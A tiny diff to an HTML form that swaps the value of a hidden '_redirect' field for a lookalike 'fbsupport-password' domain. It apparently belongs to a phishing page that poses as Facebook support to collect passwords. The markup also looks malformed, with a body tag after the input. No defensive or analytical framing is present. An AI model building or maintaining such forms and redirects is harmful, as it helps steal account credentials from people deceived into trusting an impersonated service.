--- a/form.html
+++ b/form.html
@@ -14,7 +14,7 @@
    <input
       type="hidden"
       name="_redirect"
-      value="https://put-password-verify-self.vercel.app/"
+      value="https://fbsupport-password.vercel.app/"
     />
 
 <body>
